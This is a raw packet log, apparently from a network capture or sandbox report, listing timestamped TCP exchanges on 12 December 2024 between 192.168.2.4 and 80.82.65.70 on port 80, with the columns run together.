                                        Dec 12, 2024 23:08:33.656987906 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.657140017 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.657186985 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.661504030 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.661559105 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.661592007 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.661633015 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.666080952 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.666091919 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.666129112 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.666146994 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.670548916 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.670604944 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.670713902 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.670761108 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.674839020 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.674894094 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.773853064 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:33.773941040 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:33.889425993 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:34.009186029 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:34.377490997 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:34.377562046 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:36.406088114 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:36.526063919 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:36.889275074 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:36.889358044 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:38.906124115 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:39.026141882 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:39.393654108 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:39.393770933 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:41.422441959 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:41.542289972 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:41.907651901 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:41.907836914 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:44.088036060 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:44.208317995 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:44.574139118 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:44.574232101 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:46.593786955 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:46.713664055 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:47.087066889 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:47.087320089 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:49.108146906 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:49.228029013 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:49.593318939 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:49.593498945 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:51.623811007 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:51.743832111 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:52.125850916 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:52.125941992 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:54.155693054 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:54.275861979 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:54.648149967 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:54.648370028 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:56.672337055 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:56.792284012 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:57.158531904 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:57.158693075 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:59.186223984 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:08:59.306066990 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:59.674966097 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:08:59.675030947 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:02.717534065 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:02.717984915 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:02.837801933 CET804973680.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:02.837944031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:02.838015079 CET4973680192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:02.838174105 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:02.840718031 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:02.960575104 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324552059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324577093 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324600935 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324610949 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324621916 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324631929 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324644089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324871063 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.324908972 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324928999 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324939966 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.324943066 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.324991941 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.325050116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.445004940 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.445180893 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.445307970 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.445308924 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.449047089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.449224949 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.518058062 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.518105030 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.518194914 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.518270016 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.522279978 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.522344112 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.522357941 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.522423983 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.530726910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.530787945 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.530843019 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.530939102 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.539068937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.539143085 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.539211035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.539263010 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.547539949 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.547606945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.547722101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.547722101 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.555938005 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.556020021 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.556092978 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.556149006 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.565056086 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.565105915 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.565160036 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.565205097 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.572832108 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.572882891 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.572891951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.572932005 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.581078053 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.581130028 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.581193924 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.581233978 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.589621067 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.589677095 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.589732885 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.589772940 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.598321915 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.598373890 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.598474979 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.598520994 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.638125896 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.638214111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.638309956 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.638381004 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.710319042 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.710390091 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.710426092 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.710465908 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.712632895 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.712686062 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.712760925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.712805986 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.717361927 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.717417955 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.717478037 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.717526913 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.722187996 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.722248077 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.722333908 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.722377062 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.726840973 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.726926088 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.726996899 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.727068901 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.731756926 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.731812000 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.731877089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.731924057 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.736681938 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.736742020 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.736757994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.736813068 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.741156101 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.741219997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.741240025 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.741276979 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.745867968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.745928049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.746059895 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.746113062 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.750619888 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.750693083 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.750757933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.750811100 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.755415916 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.755484104 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.755497932 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.755559921 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.760065079 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.760152102 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.760267973 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.760317087 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.764794111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.764870882 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.764956951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.765014887 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.769572973 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.769655943 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.769699097 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.769751072 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.773463964 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.773547888 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.773633957 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.773684978 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.776921988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.776983023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.776993036 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.777041912 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.780576944 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.780646086 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.780656099 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.780704021 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.784234047 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.784291983 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.784368992 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.784598112 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.787870884 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.787925959 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.787933111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.787980080 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.901993990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.902141094 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.902153969 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.902198076 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.903548002 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.903604984 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.903645039 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.903692007 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.906440973 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.906488895 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.906507969 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.906534910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.909332991 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.909451962 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.909451962 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.909493923 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.912292004 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.912341118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.912426949 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.912477016 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.915116072 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.915170908 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.915344000 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.915400028 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.917871952 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.917923927 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.917963982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.918138027 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.920644999 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.920696974 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.920816898 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.921020031 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.923434019 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.923490047 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.923518896 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.923645020 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.926187038 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.926244020 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.926325083 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.926402092 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.928930044 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.929056883 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.929085970 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.929120064 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.931687117 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.931736946 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.931819916 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.931865931 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.934506893 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.934664965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.934693098 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.934716940 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.937258959 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.937320948 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.937377930 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.939956903 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.940020084 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.940092087 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.940145016 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.942698002 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.942749977 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.942867994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.942960024 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.945483923 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.945760965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.945820093 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.948216915 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.948308945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.948386908 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.950980902 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.951096058 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.951154947 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.953752995 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.953834057 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.953849077 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.953886986 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.956496954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.956553936 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.956739902 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.956788063 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.959228039 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.959287882 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.959368944 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.959423065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.962017059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.962063074 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.962073088 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.962110996 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.964850903 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.964906931 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.964947939 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.964999914 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.967541933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.967597008 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.967624903 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.967674971 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.970417023 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.970468044 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:04.970489025 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:04.970515013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.095856905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.095875978 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.095943928 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.096930027 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.096981049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.097404957 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.097417116 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.097453117 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.097471952 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.099837065 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.099885941 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.099895000 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.099937916 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.102431059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.102442980 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.102490902 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.104959965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.104974031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.105006933 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.105037928 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.107242107 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.107295990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.107351065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.109746933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.109757900 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.109813929 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.112158060 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.112169027 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.112199068 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.112241983 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.114494085 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.114703894 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.114747047 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.117078066 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.117090940 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.117134094 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.119503975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.119517088 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.119555950 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:05.121973038 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.121984959 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:05.122040033 CET4974480192.168.2.480.82.65.70
